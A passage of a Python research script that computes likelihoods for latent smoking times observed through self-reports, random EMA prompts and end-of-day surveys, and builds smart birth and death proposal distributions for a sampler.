prob_constrained_lk = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale)
prob_constrained_uk = norm.cdf(x = current_uk, loc = curr_matched_time, scale = use_scale)
if (prob_constrained_uk - prob_constrained_lk) == tot_prob_constrained:
self.observed_data['prob_bk'][i] = (current_uk - current_lk)/(current_ub - current_lb)
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
else:
self.observed_data['prob_bk'][i] = (prob_constrained_uk - prob_constrained_lk)/tot_prob_constrained
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
elif (current_lk >= current_lb and current_uk >= current_lb):
total_prob_constrained_lb = norm.cdf(x = current_lb, loc = curr_matched_time, scale = use_scale)
total_prob_constrained_ub = norm.cdf(x = current_ub, loc = curr_matched_time, scale = use_scale)
tot_prob_constrained = total_prob_constrained_ub - total_prob_constrained_lb
prob_constrained_lk = norm.cdf(x = current_lk, loc = curr_matched_time, scale = use_scale)
prob_constrained_uk = norm.cdf(x = current_uk, loc = curr_matched_time, scale = use_scale)
if (prob_constrained_uk - prob_constrained_lk) == tot_prob_constrained:
self.observed_data['prob_bk'][i] = (current_uk - current_lk)/(current_ub - current_lb)
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
else:
self.observed_data['prob_bk'][i] = (prob_constrained_uk - prob_constrained_lk)/tot_prob_constrained
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
total_loglik += np.log(prob_reporting_when_any)
else:
total_loglik += np.nan # this case should not occur; sanity check on whether any cases were not accounted for
elif (self.observed_data['assessment_type'][i]=='random_ema') and (self.observed_data['smoke'][i]=='No'):
curr_matched_time = self.observed_data['matched_latent_time'][i]
current_lb = self.observed_data['assessment_begin_shifted'][i]
current_ub = self.observed_data['assessment_begin'][i]
if np.isnan(curr_matched_time):
self.observed_data['prob_bk'][i] = 1-prob_reporting_when_none # i.e., prob of NOT reporting when no latent smoking time can be matched
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
else:
self.observed_data['prob_bk'][i] = 1-prob_reporting_when_any # i.e., prob of NOT reporting when a latent smoking time can be matched
self.observed_data['log_prob_bk'][i] = np.log(self.observed_data['prob_bk'][i])
total_loglik += self.observed_data['log_prob_bk'][i]
else:
# this is a case when we have a self-report EMA; do not adjust total_loglik
pass
else:
# This is the case when total number of Random EMA=0
# Random EMA will not make a contribution to the overall loglikelihood
total_loglik = 0
return total_loglik
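# Editorial note: the three (current_lk, current_uk) branches above differ
# only in whether the denominator's lower truncation point is current_lk or
# current_lb; the numerator and the uniform fallback are identical in each.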
# %%
def get_for_all_current_state_lik(all_participant_ids,
all_days,
curr_dict_latent_data,
curr_dict_observed_ema,
curr_dict_observed_eod_survey,
curr_latent_params,
curr_selfreport_params,
curr_randomema_params,
curr_eodsurvey_params):
# Calculate likelihood for current configuration of points (prior to any proposal)
dict_current_state = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
# Initialize Latent object
latent_obj = Latent(participant = this_participant,
day = this_day,
latent_data = curr_dict_latent_data[this_participant][this_day],
params = copy.deepcopy(curr_latent_params))
# Initialize EODSurvey object
eodsurvey_obj = EODSurvey(participant = this_participant,
day = this_day,
latent_data = curr_dict_latent_data[this_participant][this_day],
observed_data = curr_dict_observed_eod_survey[this_participant][this_day],
params = copy.deepcopy(curr_eodsurvey_params))
# Initialize SelfReport object
selfreport_obj = SelfReport(participant = this_participant,
day = this_day,
latent_data = curr_dict_latent_data[this_participant][this_day],
observed_data = curr_dict_observed_ema[this_participant][this_day],
params = copy.deepcopy(curr_selfreport_params))
# Initialize RandomEMA object
randomema_obj = RandomEMA(participant = this_participant,
day = this_day,
latent_data = curr_dict_latent_data[this_participant][this_day],
observed_data = curr_dict_observed_ema[this_participant][this_day],
params = copy.deepcopy(curr_randomema_params))
# Calculate likelihood
            selfreport_obj.match()  # this call and the next
            randomema_obj.match()   # should yield the same matching output
total_loglik = latent_obj.calc_loglik() + eodsurvey_obj.calc_loglik() + selfreport_obj.calc_loglik() + randomema_obj.calc_loglik()
total_lik = np.exp(total_loglik)
current_dict.update({this_day:{'x':curr_dict_latent_data[this_participant][this_day]['hours_since_start_day'],
'pi_x':total_lik}})
dict_current_state.update({this_participant:current_dict})
return dict_current_state
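# Hypothetical usage sketch (identifiers below are placeholders, not from the
# source):
#   dict_current_state = get_for_all_current_state_lik(
#       all_participant_ids=[9001], all_days=[1, 2, 3],
#       curr_dict_latent_data=dict_latent_data,
#       curr_dict_observed_ema=dict_observed_ema,
#       curr_dict_observed_eod_survey=dict_observed_eod_survey,
#       curr_latent_params={'lambda_prequit': 1.0, 'lambda_postquit': 0.5},
#       curr_selfreport_params=selfreport_params,
#       curr_randomema_params=randomema_params,
#       curr_eodsurvey_params=eodsurvey_params)
#   dict_current_state[9001][1]['pi_x']  # likelihood of day 1's configuration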
# %%
# Helper functions for birth or death proposal
def get_this_loglik(x):
loglik = x.calc_loglik()
    return (x.index, loglik)
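# Note: get_this_loglik is defined at module level (rather than as a lambda or
# nested function) so that multiprocessing.Pool can pickle it for workers.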
# %%
# Helper functions for birth proposal
def construct_grid(increment, day_length):
# Construct grid of points to consider for a smart birth
if day_length <= increment:
init_grid = np.array([0, day_length])
else:
init_grid = np.arange(0, day_length, increment)
return init_grid
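# Illustrative example: construct_grid(increment=1/60, day_length=16) returns
# the minute-spaced grid np.arange(0, 16, 1/60); when day_length <= increment
# the grid degenerates to its two endpoints [0, day_length].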
def get_sets_along_grid_birth(init_grid, current_latent_data):
# What are the various configurations of points to consider in a smart/dumb birth proposal?
# We will consider birthing a new point from init_grid that does not yet exist in current_latent_data
grid = np.setdiff1d(ar1 = init_grid, ar2 = current_latent_data)
grid = np.sort(grid)
M = len(grid)
sets_along_grid = {}
for idx_grid in range(0,M):
new_latent_data = np.append(current_latent_data, grid[idx_grid])
new_latent_data = np.sort(new_latent_data)
sets_along_grid.update({idx_grid:new_latent_data})
return grid, sets_along_grid
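# Illustrative example (assumed data): with init_grid = [0, 1, 2] and
# current_latent_data = [1], the candidate birth grid is [0, 2] and the
# proposed configurations are {0: array([0, 1]), 1: array([1, 2])}.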
def parallelize_class_method(list_objects, num_processes = 8):
'''
list_objects is a list containing instances of classes
'''
with Pool(processes = num_processes) as p:
my_output = p.map(get_this_loglik, list_objects)
return my_output
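# Note: Pool-based parallelism requires this module to be importable by the
# worker processes; on spawn-based platforms (e.g., Windows), the calling code
# should sit under an `if __name__ == '__main__':` guard.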
def grid_likelihood_latent_birth(current_participant, current_day, latent_params, dict_latent_data):
'''
Calculate the likelihood at each point of a grid
Note that smart birth and smart death differ in the grids they consider
'''
# Initialize Latent object
init_latent_obj = Latent(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
params = copy.deepcopy(latent_params))
# Construct grid for smart birth
latent_grid = construct_grid(increment = 1/60, day_length = init_latent_obj.latent_data['day_length'])
latent_grid, latent_grid_sets = get_sets_along_grid_birth(init_grid = latent_grid, current_latent_data = init_latent_obj.latent_data['hours_since_start_day'])
# Work with Latent class objects
latent_total_grid_sets = len(latent_grid_sets)
# Each element of the list is an instance of the Latent class
latent_my_list = []
for idx_set in range(0, latent_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_latent_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = latent_grid_sets[idx_set]
latent_my_list.append(Latent(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
params = copy.deepcopy(latent_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, latent_total_grid_sets):
res = latent_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
f = interpolate.interp1d(x = latent_grid, y = element_wise_lik, fill_value="extrapolate")
return f
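# Editorial note: Latent.calc_loglik depends on the candidate set only through
# its size m, so birthing any single grid point yields the same likelihood;
# the interpolator f returned here is effectively constant in t.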
def grid_likelihood_eodsurvey_birth(current_participant, current_day, latent_params, eodsurvey_params, dict_latent_data, dict_observed_eod_survey):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize EODSurvey object
init_eodsurvey_obj = EODSurvey(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_eod_survey[current_participant][current_day],
params = copy.deepcopy(eodsurvey_params))
# Construct grid for smart birth
eodsurvey_grid = construct_grid(increment = 30/60, day_length = init_eodsurvey_obj.latent_data['day_length'])
eodsurvey_grid, eodsurvey_grid_sets = get_sets_along_grid_birth(init_grid = eodsurvey_grid, current_latent_data = init_eodsurvey_obj.latent_data['hours_since_start_day'])
# Work with EODSurvey class objects
eodsurvey_total_grid_sets = len(eodsurvey_grid_sets)
# Each element of the list is an instance of the EODSurvey class
eodsurvey_my_list = []
for idx_set in range(0, eodsurvey_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_eodsurvey_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = eodsurvey_grid_sets[idx_set]
eodsurvey_my_list.append(EODSurvey(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_eod_survey[current_participant][current_day],
params = copy.deepcopy(eodsurvey_params),
index = idx_set))
# No need to parallelize calculations when current number of latent smoking times is less than 6
if len(init_eodsurvey_obj.latent_data['hours_since_start_day']) < 6:
eodsurvey_grid_loglik = []
for idx_set in range(0, eodsurvey_total_grid_sets):
res = eodsurvey_my_list[idx_set].calc_loglik()
eodsurvey_grid_loglik.append(res)
else:
eodsurvey_my_output = parallelize_class_method(list_objects = eodsurvey_my_list)
eodsurvey_my_output = sorted(eodsurvey_my_output, key=lambda tup: tup[0], reverse=False)
# Get calculated loglik
eodsurvey_grid_loglik = []
for a_tuple in eodsurvey_my_output:
eodsurvey_grid_loglik.append(a_tuple[1])
eodsurvey_grid_lik = np.exp(eodsurvey_grid_loglik)
# Perform interpolation of eodsurvey at the minute-level
# Note: interpolate likelihood instead of loglikelihood to avoid having to interpolate over -inf values. This will produce an error.
f = interpolate.interp1d(x = eodsurvey_grid, y = eodsurvey_grid_lik, fill_value="extrapolate")
return f
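# Editorial note: the end-of-day component is evaluated on a coarser 30-minute
# grid (vs. 1 minute elsewhere) because each grid point costs up to 2**budget
# mvn.mvnun calls per end-of-day box; the interpolator f then supplies the
# minute-level values.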
def grid_likelihood_selfreport_birth(current_participant, current_day, latent_params, selfreport_params, dict_latent_data, dict_observed_ema):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize SelfReport object
init_selfreport_obj = SelfReport(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(selfreport_params))
# Construct grid for smart birth
selfreport_grid = construct_grid(increment = 1/60, day_length = init_selfreport_obj.latent_data['day_length'])
selfreport_grid, selfreport_grid_sets = get_sets_along_grid_birth(init_grid = selfreport_grid, current_latent_data = init_selfreport_obj.latent_data['hours_since_start_day'])
# Work with selfreport class objects
selfreport_total_grid_sets = len(selfreport_grid_sets)
# Each element of the list is an instance of the selfreport class
selfreport_my_list = []
for idx_set in range(0, selfreport_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_selfreport_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = selfreport_grid_sets[idx_set]
selfreport_my_list.append(SelfReport(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(selfreport_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, selfreport_total_grid_sets):
selfreport_my_list[idx_set].match()
res = selfreport_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
f = interpolate.interp1d(x = selfreport_grid, y = element_wise_lik, fill_value="extrapolate")
return f
def grid_likelihood_randomema_birth(current_participant, current_day, latent_params, randomema_params, dict_latent_data, dict_observed_ema):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize RandomEMA object
init_randomema_obj = RandomEMA(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(randomema_params))
# Construct grid for smart birth
randomema_grid = construct_grid(increment = 1/60, day_length = init_randomema_obj.latent_data['day_length'])
randomema_grid, randomema_grid_sets = get_sets_along_grid_birth(init_grid = randomema_grid, current_latent_data = init_randomema_obj.latent_data['hours_since_start_day'])
# Work with randomema class objects
randomema_total_grid_sets = len(randomema_grid_sets)
# Each element of the list is an instance of the randomema class
randomema_my_list = []
for idx_set in range(0, randomema_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_randomema_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = randomema_grid_sets[idx_set]
randomema_my_list.append(RandomEMA(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(randomema_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, randomema_total_grid_sets):
randomema_my_list[idx_set].match()
res = randomema_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
f = interpolate.interp1d(x = randomema_grid, y = element_wise_lik, fill_value="extrapolate")
return f
# %%
def get_for_all_smart_birth_lik(use_increment,
all_participant_ids,
all_days,
curr_dict_latent_data,
curr_dict_observed_ema,
curr_dict_observed_eod_survey,
curr_latent_params,
curr_selfreport_params,
curr_randomema_params,
curr_eodsurvey_params):
# Latent model: Likelihood corresponding to each point on the grid
dict_latent_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
interp_func = grid_likelihood_latent_birth(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
dict_latent_data = curr_dict_latent_data)
use_this_grid = construct_grid(increment = use_increment, day_length = curr_dict_latent_data[this_participant][this_day]['day_length'])
smoothed_lik = interp_func(use_this_grid)
# Note: if coarse grid ends at t* and the likelihood at t* is very close to zero,
# e.g., 1e-13, then a point on a fine grid, say at t* + 10 minutes
# might have a negative interpolated value, say -1e-10
# when this happens, we set the interpolated value to zero
smoothed_lik[(smoothed_lik < 0)] = 0
current_dict.update({this_day:smoothed_lik})
dict_latent_likelihood.update({this_participant:current_dict})
# MEM -- end of day survey subcomponent: Likelihood corresponding to each point on the grid
dict_mem_eodsurvey_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
interp_func = grid_likelihood_eodsurvey_birth(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
eodsurvey_params = curr_eodsurvey_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_eod_survey = curr_dict_observed_eod_survey)
use_this_grid = construct_grid(increment = use_increment, day_length = curr_dict_latent_data[this_participant][this_day]['day_length'])
smoothed_lik = interp_func(use_this_grid)
# Note: if coarse grid ends at t* and the likelihood at t* is very close to zero,
# e.g., 1e-13, then a point on a fine grid, say at t* + 10 minutes
# might have a negative interpolated value, say -1e-10
# when this happens, we set the interpolated value to zero
smoothed_lik[(smoothed_lik < 0)] = 0
current_dict.update({this_day:smoothed_lik})
dict_mem_eodsurvey_likelihood.update({this_participant:current_dict})
# MEM -- selfreport subcomponent: Likelihood corresponding to each point on the grid
dict_mem_selfreport_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
interp_func = grid_likelihood_selfreport_birth(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
selfreport_params = curr_selfreport_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_ema = curr_dict_observed_ema)
use_this_grid = construct_grid(increment = use_increment, day_length = curr_dict_latent_data[this_participant][this_day]['day_length'])
smoothed_lik = interp_func(use_this_grid)
# Note: if coarse grid ends at t* and the likelihood at t* is very close to zero,
# e.g., 1e-13, then a point on a fine grid, say at t* + 10 minutes
# might have a negative interpolated value, say -1e-10
# when this happens, we set the interpolated value to zero
smoothed_lik[(smoothed_lik < 0)] = 0
current_dict.update({this_day:smoothed_lik})
dict_mem_selfreport_likelihood.update({this_participant:current_dict})
# MEM -- Random EMA subcomponent: Likelihood corresponding to each point on the grid
dict_mem_randomema_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days: # all_days here
interp_func = grid_likelihood_randomema_birth(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
randomema_params = curr_randomema_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_ema = curr_dict_observed_ema)
use_this_grid = construct_grid(increment = use_increment, day_length = curr_dict_latent_data[this_participant][this_day]['day_length'])
smoothed_lik = interp_func(use_this_grid)
# Note: if coarse grid ends at t* and the likelihood at t* is very close to zero,
# e.g., 1e-13, then a point on a fine grid, say at t* + 10 minutes
# might have a negative interpolated value, say -1e-10
# when this happens, we set the interpolated value to zero
smoothed_lik[(smoothed_lik < 0)] = 0
current_dict.update({this_day:smoothed_lik})
dict_mem_randomema_likelihood.update({this_participant:current_dict})
dict_all = {'latent':dict_latent_likelihood,
'eodsurvey':dict_mem_eodsurvey_likelihood,
'selfreport':dict_mem_selfreport_likelihood,
'randomema':dict_mem_randomema_likelihood,
'all_participant_ids':all_participant_ids,
'all_days':all_days,
'curr_dict_latent_data':curr_dict_latent_data,
'use_increment':use_increment}
return dict_all
# %%
def get_for_all_smart_birth_pdf(dict_smart_birth_lik, dict_current_state):
dict_latent_likelihood = copy.deepcopy(dict_smart_birth_lik['latent'])
dict_mem_eodsurvey_likelihood = copy.deepcopy(dict_smart_birth_lik['eodsurvey'])
dict_mem_selfreport_likelihood = copy.deepcopy(dict_smart_birth_lik['selfreport'])
dict_mem_randomema_likelihood = copy.deepcopy(dict_smart_birth_lik['randomema'])
all_participant_ids = dict_smart_birth_lik['all_participant_ids']
all_days = dict_smart_birth_lik['all_days']
curr_dict_latent_data = dict_smart_birth_lik['curr_dict_latent_data']
use_increment = dict_smart_birth_lik['use_increment']
dict_smart_birth_pdf = {}
for current_participant in all_participant_ids:
current_dict_smart_birth_pdf = {}
for current_day in all_days:
# Calculate smart birth pdf
lik_latent = dict_latent_likelihood[current_participant][current_day]
lik_eodsurvey = dict_mem_eodsurvey_likelihood[current_participant][current_day]
lik_selfreport = dict_mem_selfreport_likelihood[current_participant][current_day]
lik_randomema = dict_mem_randomema_likelihood[current_participant][current_day]
current_element_wise_lik = lik_latent * lik_eodsurvey * lik_selfreport * lik_randomema
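# Under conditional independence of the measurement subcomponents given the latent
# smoking times, the joint likelihood at each grid point is the elementwise product
# above; normalizing over the grid turns it into the smart-birth proposal pmf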
current_denominator_pdf_smart_birth = np.sum(current_element_wise_lik)
current_pdf_smart_birth = current_element_wise_lik/current_denominator_pdf_smart_birth
# Update dictionary for this day
use_this_grid = construct_grid(increment = use_increment, day_length = curr_dict_latent_data[current_participant][current_day]['day_length'])
current_grid, sets_along_current_grid = get_sets_along_grid_birth(use_this_grid, dict_current_state[current_participant][current_day]['x'])
current_dict_smart_birth_pdf.update({current_day:{'grid':current_grid,
'proposed_latent_smoking_times':sets_along_current_grid,
'pdf_smart_birth':current_pdf_smart_birth,
'lik_smart_birth':current_element_wise_lik}})
# Update dictionary for this person
dict_smart_birth_pdf.update({current_participant:current_dict_smart_birth_pdf})
dict_all = {'dict_smart_birth_pdf':dict_smart_birth_pdf,
'all_participant_ids':all_participant_ids,
'all_days':all_days}
return dict_all
# %%
# Helper functions for death proposal
def get_sets_along_grid_death(current_latent_data):
# What are the various configurations of points to consider in a smart/dumb death proposal?
M = len(current_latent_data)
if M == 0:
sets_along_grid = np.array([])
grid = np.array([])
else:
current_latent_data = np.sort(current_latent_data)
grid = current_latent_data
sets_along_grid = {}
for idx_grid in range(0,M):
new_latent_data = np.delete(current_latent_data, idx_grid)
new_latent_data = np.sort(new_latent_data)
sets_along_grid.update({idx_grid:new_latent_data})
return grid, sets_along_grid
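# Illustrative example (hypothetical toy input):
#   >>> grid, sets = get_sets_along_grid_death(np.array([2.0, 5.5, 9.0]))
#   >>> grid
#   array([2. , 5.5, 9. ])
#   >>> sets[1]  # candidate configuration after deleting the point at index 1
#   array([2., 9.])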
# %%
def grid_likelihood_latent_death(current_participant, current_day, latent_params, dict_latent_data):
'''
Calculate the likelihood at each point of a grid.
Note that smart birth and smart death differ in the grids they consider:
for a death move, the grid consists of the currently existing latent points.
'''
# Initialize Latent object
init_latent_obj = Latent(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
params = copy.deepcopy(latent_params))
# Construct grid for smart death
current_grid, latent_grid_sets = get_sets_along_grid_death(current_latent_data = init_latent_obj.latent_data['hours_since_start_day'])
# Work with Latent class objects
latent_total_grid_sets = len(latent_grid_sets)
# Each element of the list is an instance of the Latent class
latent_my_list = []
for idx_set in range(0, latent_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_latent_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = latent_grid_sets[idx_set]
latent_my_list.append(Latent(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
params = copy.deepcopy(latent_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, latent_total_grid_sets):
res = latent_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
return element_wise_lik
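# The exponentiation above can underflow to 0.0 when log-likelihoods are very negative.
# When only a normalized pdf over the grid is needed, the log-sum-exp trick is a
# numerically safer alternative; a minimal sketch (hypothetical helper, not called
# anywhere in this script):
def normalize_loglik_safe(element_wise_loglik):
    element_wise_loglik = np.asarray(element_wise_loglik)
    shifted = element_wise_loglik - np.max(element_wise_loglik)  # log-sum-exp shift
    element_wise_lik = np.exp(shifted)
    return element_wise_lik / np.sum(element_wise_lik)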
# %%
def grid_likelihood_eodsurvey_death(current_participant, current_day, latent_params, eodsurvey_params, dict_latent_data, dict_observed_eod_survey):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize EODSurvey object
init_eodsurvey_obj = EODSurvey(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_eod_survey[current_participant][current_day],
params = copy.deepcopy(eodsurvey_params))
# Construct grid for smart death
current_grid, eodsurvey_grid_sets = get_sets_along_grid_death(current_latent_data = init_eodsurvey_obj.latent_data['hours_since_start_day'])
# Work with EODSurvey class objects
eodsurvey_total_grid_sets = len(eodsurvey_grid_sets)
# Each element of the list is an instance of the EODSurvey class
eodsurvey_my_list = []
for idx_set in range(0, eodsurvey_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_eodsurvey_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = eodsurvey_grid_sets[idx_set]
eodsurvey_my_list.append(EODSurvey(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_eod_survey[current_participant][current_day],
params = copy.deepcopy(eodsurvey_params),
index = idx_set))
# No need to parallelize calculations when the current number of latent smoking times is less than 6
if len(init_eodsurvey_obj.latent_data['hours_since_start_day']) < 6:
eodsurvey_grid_loglik = []
for idx_set in range(0, eodsurvey_total_grid_sets):
res = eodsurvey_my_list[idx_set].calc_loglik()
eodsurvey_grid_loglik.append(res)
else:
eodsurvey_my_output = parallelize_class_method(list_objects = eodsurvey_my_list)
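# parallelize_class_method returns (index, loglik) tuples in arbitrary completion
# order; sort by index to restore the original grid ordering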
eodsurvey_my_output = sorted(eodsurvey_my_output, key=lambda tup: tup[0], reverse=False)
# Get calculated loglik
eodsurvey_grid_loglik = []
for a_tuple in eodsurvey_my_output:
eodsurvey_grid_loglik.append(a_tuple[1])
eodsurvey_grid_lik = np.exp(eodsurvey_grid_loglik)
return eodsurvey_grid_lik
def grid_likelihood_selfreport_death(current_participant, current_day, latent_params, selfreport_params, dict_latent_data, dict_observed_ema):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize SelfReport object
init_selfreport_obj = SelfReport(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(selfreport_params))
# Construct grid for smart death
current_grid, selfreport_grid_sets = get_sets_along_grid_death(current_latent_data = init_selfreport_obj.latent_data['hours_since_start_day'])
# Work with selfreport class objects
selfreport_total_grid_sets = len(selfreport_grid_sets)
# Each element of the list is an instance of the selfreport class
selfreport_my_list = []
for idx_set in range(0, selfreport_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_selfreport_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = selfreport_grid_sets[idx_set]
selfreport_my_list.append(SelfReport(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(selfreport_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, selfreport_total_grid_sets):
selfreport_my_list[idx_set].match()
res = selfreport_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
return element_wise_lik
def grid_likelihood_randomema_death(current_participant, current_day, latent_params, randomema_params, dict_latent_data, dict_observed_ema):
'''
Calculate the likelihood at each point of a grid
'''
# Initialize RandomEMA object
init_randomema_obj = RandomEMA(participant = current_participant,
day = current_day,
latent_data = dict_latent_data[current_participant][current_day],
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(randomema_params))
# Construct grid for smart death
current_grid, randomema_grid_sets = get_sets_along_grid_death(current_latent_data = init_randomema_obj.latent_data['hours_since_start_day'])
# Work with randomema class objects
randomema_total_grid_sets = len(randomema_grid_sets)
# Each element of the list is an instance of the randomema class
randomema_my_list = []
for idx_set in range(0, randomema_total_grid_sets):
candidate_latent_data = copy.deepcopy(init_randomema_obj.latent_data)
candidate_latent_data['hours_since_start_day'] = randomema_grid_sets[idx_set]
randomema_my_list.append(RandomEMA(participant = current_participant,
day = current_day,
latent_data = candidate_latent_data,
observed_data = dict_observed_ema[current_participant][current_day],
params = copy.deepcopy(randomema_params),
index = idx_set))
element_wise_loglik = []
for idx_set in range(0, randomema_total_grid_sets):
randomema_my_list[idx_set].match()
res = randomema_my_list[idx_set].calc_loglik()
element_wise_loglik.append(res)
element_wise_lik = np.exp(element_wise_loglik)
return element_wise_lik
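# The four grid_likelihood_*_death helpers above share the same skeleton; a generic
# version is sketched below (hypothetical helper, not called anywhere in this script).
# make_object(candidate_latent_data, idx) must return an object exposing calc_loglik()
# (and match() when needs_match=True), mirroring the classes used above; the
# parallelization used for large end-of-day survey configurations is omitted here.
def grid_likelihood_death_generic(make_object, latent_data, needs_match = False):
    current_grid, grid_sets = get_sets_along_grid_death(current_latent_data = latent_data['hours_since_start_day'])
    element_wise_loglik = []
    for idx_set in range(0, len(grid_sets)):
        candidate_latent_data = copy.deepcopy(latent_data)
        candidate_latent_data['hours_since_start_day'] = grid_sets[idx_set]
        this_obj = make_object(candidate_latent_data, idx_set)
        if needs_match:
            this_obj.match()
        element_wise_loglik.append(this_obj.calc_loglik())
    return np.exp(element_wise_loglik)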
# %%
def get_for_all_smart_death_lik(all_participant_ids,
all_days,
curr_dict_latent_data,
curr_dict_observed_ema,
curr_dict_observed_eod_survey,
curr_latent_params,
curr_selfreport_params,
curr_randomema_params,
curr_eodsurvey_params):
# Latent model: Likelihood corresponding to each point on the grid
dict_latent_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
lik = grid_likelihood_latent_death(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
dict_latent_data = curr_dict_latent_data)
current_dict.update({this_day:lik})
dict_latent_likelihood.update({this_participant:current_dict})
# MEM -- end of day survey subcomponent: Likelihood corresponding to each point on the grid
dict_mem_eodsurvey_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
lik = grid_likelihood_eodsurvey_death(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
eodsurvey_params = curr_eodsurvey_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_eod_survey = curr_dict_observed_eod_survey)
current_dict.update({this_day:lik})
dict_mem_eodsurvey_likelihood.update({this_participant:current_dict})
# MEM -- selfreport subcomponent: Likelihood corresponding to each point on the grid
dict_mem_selfreport_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
lik = grid_likelihood_selfreport_death(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
selfreport_params = curr_selfreport_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_ema = curr_dict_observed_ema)
current_dict.update({this_day:lik})
dict_mem_selfreport_likelihood.update({this_participant:current_dict})
# MEM -- Random EMA subcomponent: Likelihood corresponding to each point on the grid
dict_mem_randomema_likelihood = {}
for this_participant in all_participant_ids:
current_dict = {}
for this_day in all_days:
lik = grid_likelihood_randomema_death(current_participant = this_participant,
current_day = this_day,
latent_params = curr_latent_params,
randomema_params = curr_randomema_params,
dict_latent_data = curr_dict_latent_data,
dict_observed_ema = curr_dict_observed_ema)
current_dict.update({this_day:lik})
dict_mem_randomema_likelihood.update({this_participant:current_dict})
dict_all = {'latent':dict_latent_likelihood,
'eodsurvey':dict_mem_eodsurvey_likelihood,
'selfreport':dict_mem_selfreport_likelihood,
'randomema':dict_mem_randomema_likelihood,
'all_participant_ids':all_participant_ids,
'all_days':all_days,
'curr_dict_latent_data':curr_dict_latent_data}
return dict_all
# %%
def get_for_all_smart_death_pdf(dict_smart_death_lik, dict_current_state):
